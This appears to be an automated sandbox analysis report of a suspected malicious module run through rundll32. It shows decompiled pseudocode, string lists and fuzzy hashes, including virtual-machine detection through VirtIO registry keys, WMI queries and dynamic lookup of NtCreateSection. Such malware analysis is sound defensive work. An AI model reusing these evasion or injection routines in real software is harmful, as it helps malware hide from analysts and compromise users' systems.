                                        				 *(_t206 + 0x28) = _t152;
                                        				asm("movups xmm0, [esp+0x20]");
                                        				asm("inc ecx");
                                        				_t175 =  &(( &(_t172[0x41]))[ *((intOrPtr*)(_t200 + 8))]) >> 3;
                                        				if (_t175 == 0) goto 0xf2ffd9ab;
                                        				_t176 = _t175 * 8;
                                        				if (_t176 - 0x1000 < 0) goto 0xf2ffd9a3;
                                        				_t148 = _t176 + 0x27;
                                        				if (_t148 - _t176 > 0) goto 0xf2ffd98d;
                                        				E0000021E21EF310A170(_t148);
                                        				asm("int3");
                                        				_t177 = _t148;
                                        				E0000021E21EF310B674(_t148, _t177);
                                        				_t52 = _t148 + 0x27; // 0x27
                                        				 *((long long*)((_t52 & 0xffffffe0) - 8)) = _t148;
                                        				goto 0xf2ffd9ab;
                                        				E0000021E21EF310B674(_t148, _t177);
                                        				_t155 = _t148;
                                        				 *((long long*)(_t203 + 0x50)) = _t155;
                                        				 *((long long*)(_t203 + 0x60)) = _t155;
                                        				if (_t155 == 0) goto 0xf2ffda58;
                                        				asm("movups xmm1, [edi]");
                                        				asm("movaps [esp+0x30], xmm1");
                                        				asm("movups xmm0, [esi]");
                                        				asm("movaps [esp+0x20], xmm0");
                                        				asm("psrldq xmm0, 0x8");
                                        				asm("dec cx");
                                        				 *(_t155 + 0x30) =  &(_t209[2]) & 0x0000ffff;
                                        				asm("psrldq xmm1, 0x8");
                                        				asm("dec ax");
                                        				 *((short*)(_t155 + 0x32)) = _t116;
                                        				 *((intOrPtr*)(_t155 + 0x34)) = r14w;
                                        				_t60 = _t155 + 0x38; // 0x38
                                        				_t197 = _t60;
                                        				 *((char*)(_t148 + _t197)) = 0x3a;
                                        				 *((char*)(_t148 + _t197)) = 0x20;
                                        				_t149 = _t148 + _t197;
                                        				 *((char*)(_t177 + _t149)) = 0xd;
                                        				 *((char*)(_t177 + _t149 + _t197 + 1)) = 0xa;
                                        				if (_t209 == 0) goto 0xf2ffda3e;
                                        				E0000021E21EF310DC90( *(_t155 + 0x30) & 0x0000ffff, _t115, _t116, _t117, _t197,  *(_t206 + 0x20), _t197, _t200, _t209);
                                        				if (_t200 == 0) goto 0xf2ffda58;
                                        				return E0000021E21EF310DC90( *(_t155 + 0x30) & 0x0000ffff, _t115, _t116, _t117, _t197 + _t197,  *((intOrPtr*)(_t206 + 0x30)), _t197, _t200, _t200);
                                        			}

                                        APIs
                                        Strings
                                        • class boost::beast::http::basic_fields<class std::allocator<char> >::value_type &__cdecl boost::beast::http::basic_fields<class std::allocator<char> >::new_element(enum boost::beast::http::field,class boost::basic_string_view<char,struct std::char_traits<char>, xrefs: 0000021EF2FFD7D5, 0000021EF2FFD892
                                        • field name too large, xrefs: 0000021EF2FFD78D
                                        • D:\Sources\boost_1_68_0\boost/beast/http/impl/fields.ipp, xrefs: 0000021EF2FFD7E0, 0000021EF2FFD89D
                                        • field value too large, xrefs: 0000021EF2FFD84A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception__std_exception_copy$Throw$Concurrency::cancel_current_taskFileHeaderRaise
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/http/impl/fields.ipp$class boost::beast::http::basic_fields<class std::allocator<char> >::value_type &__cdecl boost::beast::http::basic_fields<class std::allocator<char> >::new_element(enum boost::beast::http::field,class boost::basic_string_view<char,struct std::char_traits<char>$field name too large$field value too large
                                        • API String ID: 2268884189-437498112
                                        • Opcode ID: 8b94da2d244788e01d6954675266b636e1148d6a6959ee6a0656242e89a3e3da
                                        • Instruction ID: 1798307bc06c5e1acc5c25c56136e2bbe9e280e2c7bd1dd08d06145fa7857590
                                        • Opcode Fuzzy Hash: 8b94da2d244788e01d6954675266b636e1148d6a6959ee6a0656242e89a3e3da
                                        • Instruction Fuzzy Hash: 9D91C573225B8081EF508B54E8543EA73B4F7A4754F425316EE8D53BA9EB3CC596C344
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 19%
                                        			E0000021E21EF302A2A0() {
                                        				void* _t40;
                                        				void* _t41;
                                        				intOrPtr _t50;
                                        				void* _t73;
                                        				signed long long _t74;
                                        				signed long long _t75;
                                        				char* _t79;
                                        				signed long long _t80;
                                        				long long _t81;
                                        				long long _t91;
                                        				signed long long _t94;
                                        				int _t98;
                                        				long long _t101;
                                        				int _t102;
                                        				void* _t103;
                                        				signed long long _t104;
                                        				void* _t105;
                                        				void* _t106;
                                        				void* _t107;
                                        				long long _t108;
                                        				signed long long _t110;
                                        				long long _t111;
                                        				void* _t115;
                                        				void* _t116;
                                        				long _t117;
                                        
                                        				 *((long long*)(_t105 + 8)) = _t81;
                                        				 *((long long*)(_t105 + 0x10)) = _t91;
                                        				 *((long long*)(_t105 + 0x18)) = _t108;
                                        				 *((long long*)(_t105 + 0x20)) = _t111;
                                        				E0000021E21EF310C220();
                                        				_t106 = _t105 - _t73;
                                        				_t104 = _t106 + 0x50;
                                        				_t74 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_t75 = _t74 ^ _t104;
                                        				 *(_t104 + 0x210) = _t75;
                                        				GetStdHandle(_t117);
                                        				_t80 = _t75;
                                        				if (_t75 == 0) goto 0xf302a362;
                                        				if (GetFileType(_t116) == 0) goto 0xf302a362;
                                        				_t40 = E0000021E21EF301E120(_t39);
                                        				 *((long long*)(_t106 + 0x28)) = _t104 + 0x268;
                                        				 *(_t106 + 0x20) = _t102;
                                        				r8d = 0x200;
                                        				0xf3116a8c();
                                        				_t41 =  <  ? 0xffffffff : _t40;
                                        				if (_t41 < 0) goto 0xf302a344;
                                        				 *(_t106 + 0x20) = _t102;
                                        				r8d = _t41;
                                        				WriteFile(_t103, ??, ??, ??);
                                        				goto 0xf302a52c;
                                        				_t50 = E0000021E21EF302A5B0( *((intOrPtr*)(_t104 + 0x260))) + 1;
                                        				_t15 = _t75 + _t75 + 0xf; // 0x10
                                        				if (_t15 - _t75 + _t75 > 0) goto 0xf302a38b;
                                        				E0000021E21EF310C220();
                                        				_t107 = _t106 - 0xfffffff0;
                                        				if (_t107 + 0x50 != 0) goto 0xf302a3b2;
                                        				_t101 = L"no stack?";
                                        				goto 0xf302a47a;
                                        				 *((intOrPtr*)(_t107 + 0x28)) = _t50;
                                        				r9d = _t50;
                                        				 *((long long*)(_t107 + 0x20)) = _t101;
                                        				if (MultiByteToWideChar(_t98, _t102, _t79) != 0) goto 0xf302a3f7;
                                        				_t94 = _t102;
                                        				if (_t80 == 0) goto 0xf302a3f7;
                                        				 *((short*)(_t101 + _t94 * 2)) =  *((char*)(_t94 +  *((intOrPtr*)(_t104 + 0x260))));
                                        				if (_t94 + 1 - _t80 < 0) goto 0xf302a3e0;
                                        				_t110 = _t102;
                                        				if (_t80 == 0) goto 0xf302a47a;
                                        				r10d = 0x53;
                                        				r11d = _t115 + 0x20;
                                        				r14d = _t115 - 0x10;
                                        				r15d = _t115 + 0x10;
                                        				if ( *((short*)(_t101 + _t110 * 2)) != 0x25) goto 0xf302a472;
                                        				if (( *(_t101 + 2 + _t110 * 2) & 0x0000ffff) + 0xffffffd6 - 0x49 > 0) goto 0xf302a472;
                                        				goto __rcx;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Event$FileSource$ByteCharDeregisterHandleMultiRegisterReportTypeWideWrite_invalid_parameter_noinfo
                                        • String ID: OpenSSL$OpenSSL: FATAL$no stack?
                                        • API String ID: 3447168048-278800372
                                        • Opcode ID: 327d4abda4e7108db4f5c15a324cbebe442dd0e14d6fedb6e28765cb1fe8b8f8
                                        • Instruction ID: 6aa16a416b55a6f6548ee5cb6ae0d5ac5e603c608512536afcd3762e02651933
                                        • Opcode Fuzzy Hash: 327d4abda4e7108db4f5c15a324cbebe442dd0e14d6fedb6e28765cb1fe8b8f8
                                        • Instruction Fuzzy Hash: 5A61E072200B8096EF208F21EC483DA77A4F769B94F464626EE5A47F99DF3CC652C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 27%
                                        			E0000021E21EF301BAE0(intOrPtr __ecx, long long* __rax, long long __rbx, long long* __rdx, long long __rdi, long long __rsi, long long* __r8, long long _a8, long long _a16, long long _a24, long long _a32) {
                                        				void* _v40;
                                        				intOrPtr _v64;
                                        				long long _v72;
                                        				long long _v80;
                                        				intOrPtr _v88;
                                        				void* _v96;
                                        				long long _v104;
                                        				long long _v120;
                                        				intOrPtr _v128;
                                        				intOrPtr _v136;
                                        				void* __rbp;
                                        				intOrPtr _t38;
                                        				void* _t43;
                                        				void* _t54;
                                        				intOrPtr _t55;
                                        				void* _t57;
                                        				long long* _t63;
                                        				void* _t89;
                                        				long long* _t98;
                                        				long long* _t99;
                                        
                                        				_t86 = __rsi;
                                        				_t64 = __rbx;
                                        				_t63 = __rax;
                                        				_t49 = __ecx;
                                        				_a8 = __rbx;
                                        				_a16 = __rsi;
                                        				_a24 = __rdi;
                                        				_t99 = __r8;
                                        				_t98 = __rdx;
                                        				_a32 = __rbx;
                                        				_t55 = __ecx;
                                        				_v96 = __rbx;
                                        				_v88 = 0;
                                        				_t7 = _t64 + 0x28; // 0x28
                                        				r8d = _t7;
                                        				E0000021E21EF310E410(__ecx, 0, _t54, _t57,  &_v80, __rdx, __rdi, __r8);
                                        				_v104 = __rbx;
                                        				GetModuleHandleW(??);
                                        				GetProcAddress(??, ??);
                                        				GetProcAddress(??, ??);
                                        				GetProcAddress(??, ??);
                                        				_v104 = _t55;
                                        				_v88 = 0x30;
                                        				_v120 = __rsi;
                                        				asm("xorps xmm0, xmm0");
                                        				_v128 = 0x8000000;
                                        				_v80 = __rsi;
                                        				_t17 = _t86 + 0x40; // 0x40
                                        				_t38 = _t17;
                                        				_v72 = __rsi;
                                        				_v64 = _t38;
                                        				_v136 = _t38;
                                        				asm("movdqu [ebp-0x10], xmm0");
                                        				if ( *_t63() < 0) goto 0xf301bbfe;
                                        				GetCurrentProcess();
                                        				if (E0000021E21EF301B9B0(_t63, _t63, _a32, _t63, _t89,  &_v96) != 0) goto 0xf301bc05;
                                        				r8d = _v104;
                                        				E0000021E21EF310E410(_t49, 0, _t54, _t57, _v96, _t63, _t63,  &_v96);
                                        				 *_t98 = _v96;
                                        				if (_t99 == 0) goto 0xf301bc05;
                                        				 *_t99 = _a32;
                                        				goto 0xf301bc09;
                                        				_t43 =  *_t63();
                                        				if (_a32 == 0) goto 0xf301bc16;
                                        				if (_t99 != 0) goto 0xf301bc16;
                                        				 *_t63();
                                        				return _t43;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule$CurrentProcess
                                        • String ID: 0$NtCreateSection$RtlNtStatusToDosError$ZwClose$ntdll.dll
                                        • API String ID: 1077269151-3111467594
                                        • Opcode ID: 8efdbcc87b961bce842ecd1f6197e8cd36daaac88b2062f1e09bf8dfbb529105
                                        • Instruction ID: 9138b31000c82e172b3ddcd654eed36ad6c0080374c66b51ec25a465888ee9c3
                                        • Opcode Fuzzy Hash: 8efdbcc87b961bce842ecd1f6197e8cd36daaac88b2062f1e09bf8dfbb529105
                                        • Instruction Fuzzy Hash: 3C412B32710B118AEB10DF66EC486DE37B4F758B98F164126EE4993B19DF38C486C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 44%
                                        			E0000021E21EF3120430(void* __rbx, long long __rcx, long long __rdx, void* __rdi, struct _IO_FILE* __rsi, long __r14) {
                                        				long _t32;
                                        				int _t39;
                                        				signed long long _t56;
                                        				signed long long _t57;
                                        				signed long long _t59;
                                        				void* _t83;
                                        				void* _t85;
                                        				signed long long _t86;
                                        
                                        				_t86 = _t85 - 0x4f0;
                                        				_t56 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_t57 = _t56 ^ _t86;
                                        				 *(_t85 - 0x3f0 + 0x3e0) = _t57;
                                        				 *((long long*)(_t86 + 0x40)) = __rcx;
                                        				 *((long long*)(_t86 + 0x58)) = __rdx;
                                        				r14d = r8d;
                                        				 *(_t86 + 0x38) = r8d;
                                        				GetStdHandle(__r14);
                                        				_t6 = _t57 - 1; // -1
                                        				if (_t6 - 0xfffffffd > 0) goto 0xf31204f9;
                                        				_t32 = GetFileType(__rdi);
                                        				if (_t32 != 2) goto 0xf31204f9;
                                        				 *(_t86 + 0x28) = r14d;
                                        				 *((long long*)(_t86 + 0x20)) = __rdx;
                                        				0xf3120670();
                                        				if (_t32 < 0) goto 0xf31204f9;
                                        				_t59 = (_t57 | 0xffffffff) + 1;
                                        				if ( *((intOrPtr*)(_t86 + 0x60 + _t59 * 2)) != 0) goto 0xf31204c7;
                                        				_t91 = _t86 + 0x30;
                                        				 *((intOrPtr*)(_t86 + 0x30)) = 0;
                                        				r8d = _t32;
                                        				 *((long long*)(_t86 + 0x20)) = __rcx;
                                        				if (WriteConsoleW(__rbx, _t83, ??) == 0) goto 0xf31204f9;
                                        				abort();
                                        				asm("int3");
                                        				E0000021E21EF311768C(2, _t59);
                                        				if (( *(_t59 + 0x14) & 0x000004c0) != 0) goto 0xf3120529;
                                        				E0000021E21EF311768C(2, _t59);
                                        				r9d = 0;
                                        				_t20 = _t91 + 4; // 0x4
                                        				r8d = _t20;
                                        				E0000021E21EF312C8E4(0, _t59, _t57, _t59, _t86 + 0x60, _t86 + 0x30);
                                        				L2();
                                        				 *(_t86 + 0x48) = _t59;
                                        				E0000021E21EF311768C(2, _t59);
                                        				 *(_t86 + 0x50) = _t59;
                                        				 *((long long*)(_t86 + 0x20)) = _t86 + 0x38;
                                        				L1();
                                        				E0000021E21EF311768C(2, _t86 + 0x38);
                                        				_t39 = fflush(__rsi);
                                        				abort();
                                        				asm("int3");
                                        				asm("int3");
                                        				r10d =  *( *(_t86 + 0x28));
                                        				 *(_t86 + 0x28) = r10d;
                                        				goto 0xf312062c;
                                        				asm("int3");
                                        				asm("int3");
                                        				return _t39;
                                        			}












                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: abort$ConsoleFileHandleTypeWritefflushswprintf
                                        • String ID: Assertion failed: %Ts, file %Ts, line %d$Z:\hooker2\Common\md5.cpp$nLength % 4 == 0
                                        • API String ID: 1760031326-1349988364
                                        • Opcode ID: 069c7830e6e6b571874dd099d804a634adff7791f68b9f21957c8a256731c135
                                        • Instruction ID: b50ca6ed8af4281986b815c90b50136c4e22cf7451d836048af516b3e4460301
                                        • Opcode Fuzzy Hash: 069c7830e6e6b571874dd099d804a634adff7791f68b9f21957c8a256731c135
                                        • Instruction Fuzzy Hash: 38315E71214A8086EB24AB65EC597DB73F4E7A07A0F414316AE9903EDADF3CC906C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 21%
                                        			E0000021E21EF3020250(long long __rbx, long long __rsi, long long _a8, long long _a16) {
                                        				void* _v8;
                                        				signed long long _v24;
                                        				char _v536;
                                        				long long _v544;
                                        				long long _v552;
                                        				long long _v560;
                                        				long long _v568;
                                        				long long _v576;
                                        				long long _v584;
                                        				long long _v592;
                                        				char _v600;
                                        				long long _v616;
                                        				void* __rdi;
                                        				void* _t30;
                                        				void* _t33;
                                        				void* _t35;
                                        				signed long long _t39;
                                        				void* _t58;
                                        				void* _t60;
                                        				void* _t64;
                                        				void* _t67;
                                        
                                        				_a8 = __rbx;
                                        				_a16 = __rsi;
                                        				_t39 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_v24 = _t39 ^ _t64 - 0x00000280;
                                        				_v592 = L"SYSTEM\\ControlSet001\\Services\\vioscsi";
                                        				_v584 = L"SYSTEM\\ControlSet001\\Services\\viostor";
                                        				_v576 = L"SYSTEM\\ControlSet001\\Services\\VirtIO-FS Service";
                                        				_v568 = L"SYSTEM\\ControlSet001\\Services\\VirtioSerial";
                                        				_v560 = L"SYSTEM\\ControlSet001\\Services\\BALLOON";
                                        				_v552 = L"SYSTEM\\ControlSet001\\Services\\BalloonService";
                                        				_v544 = L"SYSTEM\\ControlSet001\\Services\\netkvm";
                                        				r8d = 0x200;
                                        				E0000021E21EF310E410(_t30, 0, _t33, _t35,  &_v536, _t58, _t60, _t67);
                                        				0xf301e130();
                                        				_v600 = __rsi;
                                        				r9d = 0x20019;
                                        				_v616 =  &_v600;
                                        				r8d = 0;
                                        				if (RegOpenKeyExW(??, ??, ??, ??, ??) == 0) goto 0xf3020339;
                                        				if (__rbx + 1 - 7 < 0) goto 0xf30202d0;
                                        				goto 0xf3020349;
                                        				RegCloseKey(??);
                                        				E0000021E21EF310C290();
                                        				return 1;
                                        			}

























                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpen
                                        • String ID: Checking reg key %s $SYSTEM\ControlSet001\Services\BALLOON$SYSTEM\ControlSet001\Services\BalloonService$SYSTEM\ControlSet001\Services\VirtIO-FS Service$SYSTEM\ControlSet001\Services\VirtioSerial$SYSTEM\ControlSet001\Services\netkvm$SYSTEM\ControlSet001\Services\vioscsi$SYSTEM\ControlSet001\Services\viostor
                                        • API String ID: 47109696-2595593112
                                        • Opcode ID: 5fcd67d3b96c9805d83ee532e5670651764c04fb282fe68a4cc2dfb8abe56a19
                                        • Instruction ID: 5d016281e7230fd6a66b53cf5dcc7a082c407228552792105ac4a4c5712c154b
                                        • Opcode Fuzzy Hash: 5fcd67d3b96c9805d83ee532e5670651764c04fb282fe68a4cc2dfb8abe56a19
                                        • Instruction Fuzzy Hash: B531F836215B8092EA509B51F8887CBB3F8F798B84F524126EE8D43B68DF3CC516CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 31%
                                        			E0000021E21EF301D8E7(void* __esi, long long __rax, char* __rbx, intOrPtr* __rsi, void* __r12, long long __r13) {
                                        				void* _t91;
                                        				void* _t92;
                                        				void* _t98;
                                        				void* _t101;
                                        				long long* _t135;
                                        				char* _t145;
                                        				void* _t147;
                                        				intOrPtr* _t157;
                                        				intOrPtr* _t159;
                                        				intOrPtr* _t175;
                                        				void* _t184;
                                        				short* _t185;
                                        				intOrPtr* _t190;
                                        				intOrPtr* _t191;
                                        				long long* _t193;
                                        				long long* _t202;
                                        				void* _t204;
                                        
                                        				_t145 = __rbx;
                                        				_t135 = __rax;
                                        				_t197 =  *__rsi;
                                        				E0000021E21EF310B674(__rax, _t147);
                                        				_t193 = __rax;
                                        				 *((long long*)(_t202 + 0xa8)) = __rax;
                                        				if (__rax == 0) goto 0xf301d91b;
                                        				 *((long long*)(__rax + 8)) = __r13;
                                        				 *((intOrPtr*)(__rax + 0x10)) = 1;
                                        				_t148 =  *__rsi;
                                        				E0000021E21EF310D920(_t101, __rbx,  *__rsi, _t197);
                                        				 *_t193 = _t135;
                                        				goto 0xf301d91e;
                                        				 *((long long*)(_t202 + 8)) = __r13;
                                        				if (__r13 != 0) goto 0xf301d932;
                                        				E0000021E21EF310D8F0();
                                        				E0000021E21EF310B674(_t135, _t148);
                                        				 *((long long*)(_t202 + 0xa8)) = _t135;
                                        				if (_t135 == 0) goto 0xf301d967;
                                        				 *((long long*)(_t135 + 8)) = __r13;
                                        				 *((intOrPtr*)(_t135 + 0x10)) = 1;
                                        				E0000021E21EF310D920(_t101, _t145, "WQL", _t197);
                                        				 *_t135 = _t135;
                                        				goto 0xf301d96a;
                                        				 *_t202 = __r13;
                                        				if (__r13 != 0) goto 0xf301d97e;
                                        				E0000021E21EF310D8F0();
                                        				 *((long long*)(_t204 + 0x28)) = _t204 + 0x68;
                                        				 *((long long*)(_t204 + 0x20)) = __r13;
                                        				r9d = 0x30;
                                        				r15d =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t204 + 0x58)))) + 0xa0))();
                                        				_t106 = __esi;
                                        				asm("lock inc ecx");
                                        				if (__esi != 1) goto 0xf301d9eb;
                                        				if ( *((intOrPtr*)(__r13)) == 0) goto 0xf301d9cc;
                                        				__imp__#6();
                                        				 *((long long*)(__r13)) = __r13;
                                        				if ( *((intOrPtr*)(__r13 + 8)) == 0) goto 0xf301d9de;
                                        				0xf310bdc8();
                                        				 *((long long*)(__r13 + 8)) = __r13;
                                        				0xf310bdc8();
                                        				 *_t202 = __r13;
                                        				asm("lock xadd [edi+0x10], eax");
                                        				if (__esi != 1) goto 0xf301da2b;
                                        				if ( *((intOrPtr*)(__r13)) == 0) goto 0xf301da0c;
                                        				__imp__#6();
                                        				 *((long long*)(__r13)) = __r13;
                                        				if ( *((intOrPtr*)(__r13 + 8)) == 0) goto 0xf301da1e;
                                        				0xf310bdc8();
                                        				 *((long long*)(__r13 + 8)) = __r13;
                                        				0xf310bdc8();
                                        				 *((long long*)(_t202 + 8)) = __r13;
                                        				if (r15d >= 0) goto 0xf301da4e;
                                        				_t157 =  *((intOrPtr*)(_t204 + 0x58));
                                        				if (_t157 == 0) goto 0xf301da44;
                                        				 *((intOrPtr*)( *_t157 + 0x10))();
                                        				goto 0xf301dbed;
                                        				_t159 =  *((intOrPtr*)(_t204 + 0x68));
                                        				if (_t159 == 0) goto 0xf301dbbd;
                                        				 *((long long*)(_t202 - 0x70)) = __r13;
                                        				 *((intOrPtr*)(_t202 + 0xa8)) = r13d;
                                        				 *((long long*)(_t204 + 0x20)) = _t202 + 0xa8;
                                        				r8d = 1;
                                        				 *((intOrPtr*)( *_t159 + 0x20))();
                                        				if ( *((intOrPtr*)(_t202 + 0xa8)) == 0) goto 0xf301dbb8;
                                        				__imp__#8();
                                        				if ( *((long long*)(_t202 - 0x70)) == 0) goto 0xf301dbb8;
                                        				0xf3018a7c();
                                        				_t184 =  >=  ?  *((void*)(_t202 - 0x28)) : _t202 - 0x28;
                                        				_t139 =  *((intOrPtr*)( *((intOrPtr*)(_t202 - 0x70))));
                                        				 *((long long*)(_t204 + 0x28)) = __r13;
                                        				 *((long long*)(_t204 + 0x20)) = __r13;
                                        				r8d = 0;
                                        				_t91 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t202 - 0x70)))) + 0x20))();
                                        				_t185 =  *((intOrPtr*)(_t202 + 0x18));
                                        				if (_t185 == 0) goto 0xf301db78;
                                        				 *((long long*)(_t202 - 0x38)) = __r13;
                                        				 *((long long*)(_t202 - 0x30)) = __r13;
                                        				 *((long long*)(_t202 - 0x30)) = 7;
                                        				 *((long long*)(_t202 - 0x38)) = __r13;
                                        				 *((intOrPtr*)(_t202 - 0x48)) = r13w;
                                        				if ( *_t185 != 0) goto 0xf301db10;
                                        				goto 0xf301db1a;
                                        				_t200 = __r13 + 1;
                                        				if ( *((short*)(_t185 + (__r13 + 1) * 2)) != 0) goto 0xf301db10;
                                        				_t92 = E0000021E21EF2FE8020(_t91, __esi, _t139, _t145, _t202 - 0x48, _t185, __r13, __r13 + 1, _t200);
                                        				0xf3018bcc();
                                        				E0000021E21EF2FE6100(E0000021E21EF2FE7EF0(_t92, __esi, _t145, _t204 + 0x70, _t139), _t106, _t202 + 0x30);
                                        				if ( *((intOrPtr*)(_t202 - 0x30)) - 8 < 0) goto 0xf301db67;
                                        				0xf2fe8550();
                                        				 *((long long*)(_t202 - 0x30)) = 7;
                                        				 *((long long*)(_t202 - 0x38)) = __r13;
                                        				 *((intOrPtr*)(_t202 - 0x48)) = r13w;
                                        				__imp__#9();
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t202 - 0x70)))) + 0x10))();
                                        				if ( *((intOrPtr*)(_t202 - 0x10)) - 8 < 0) goto 0xf301dba7;
                                        				0xf2fe8550();
                                        				 *((long long*)(_t202 - 0x10)) = 7;
                                        				 *((long long*)(_t202 - 0x18)) = __r13;
                                        				 *((intOrPtr*)(_t202 - 0x28)) = r13w;
                                        				_t190 =  *((intOrPtr*)(_t204 + 0x58));
                                        				if (_t190 == 0) goto 0xf301dbd5;
                                        				 *((intOrPtr*)( *_t190 + 0x10))();
                                        				_t191 =  *((intOrPtr*)(_t204 + 0x60));
                                        				if (_t191 == 0) goto 0xf301dbed;
                                        				 *((intOrPtr*)( *_t191 + 0x10))();
                                        				_t175 =  *((intOrPtr*)(_t204 + 0x68));
                                        				if (_t175 == 0) goto 0xf301dbf8;
                                        				_t98 =  *((intOrPtr*)( *_t175 + 0x10))();
                                        				 *((long long*)(_t145 + 0x18)) = 0xf;
                                        				 *((long long*)(_t145 + 0x10)) = __r13;
                                        				 *_t145 = 0;
                                        				0xf2fe6770();
                                        				 *((intOrPtr*)(_t204 + 0x50)) = 1;
                                        				return E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t98, _t106, _t204 + 0x70), _t106, _t202 - 0x68);
                                        			}





















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$ConvertFree_com_issue_error_com_util::
                                        • String ID: WQL
                                        • API String ID: 3361228291-1249411209
                                        • Opcode ID: 9231922dca4d2be6e7763dd26585ec52659178d3308919129ccb0289ea1da193
                                        • Instruction ID: 660bdb2ded0759f3a3f10b819eb60e0da0b6b26f7d76fb4ac8e741c5a9168553
                                        • Opcode Fuzzy Hash: 9231922dca4d2be6e7763dd26585ec52659178d3308919129ccb0289ea1da193
                                        • Instruction Fuzzy Hash: 52519E76201B4085EF15EF25E8583EE23A0FBA1B98F068526DE9A07F96CF3CC556D350
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0000021E21EF31288C8(void* __edx, char* __r8, void* __r9) {
                                        				signed long long _t9;
                                        				signed long long _t10;
                                        				void* _t15;
                                        
                                        				_t9 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_t10 = _t9 ^ _t15 - 0x000000c0;
                                        				 *(_t15 - 0x4f + 0x3f) = _t10;
                                        				if (__r9 - _t10 + 4 >= 0) goto 0xf3128914;
                                        				 *__r8 = 0;
                                        				E0000021E21EF310C290();
                                        				return 0xc;
                                        			}







                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                        • API String ID: 3215553584-2617248754
                                        • Opcode ID: c27a961c99c4b90775e64e9477821c3fb21b6c96bf9c920cb1ab29b6d578e68f
                                        • Instruction ID: 696883b6c42c800d2ea3339d84f7eeb87cfa6d8ea5fa8815c224639d9e18fdad
                                        • Opcode Fuzzy Hash: c27a961c99c4b90775e64e9477821c3fb21b6c96bf9c920cb1ab29b6d578e68f
                                        • Instruction Fuzzy Hash: 64416672601B4489EF14CF65EC457CE33F8E728798F42452AAE9C47B95EA38C12AC340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindowwcsstr
                                        • String ID: Service-0x$_OPENSSL_isservice
                                        • API String ID: 459917433-1672312481
                                        • Opcode ID: 4e86c7adac69599f6ce400253259397c15a7042e90f1d57d68cc194ce68e08f3
                                        • Instruction ID: 2c2fef7057a79fd65c52ac304f28f6b5b8d807c844746d2540f2a931d53d2e3d
                                        • Opcode Fuzzy Hash: 4e86c7adac69599f6ce400253259397c15a7042e90f1d57d68cc194ce68e08f3
                                        • Instruction Fuzzy Hash: 21411E72201B409AEF608F69EC487DA22A4FB69BB4F464725AD6D46FE4DF2CC156C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
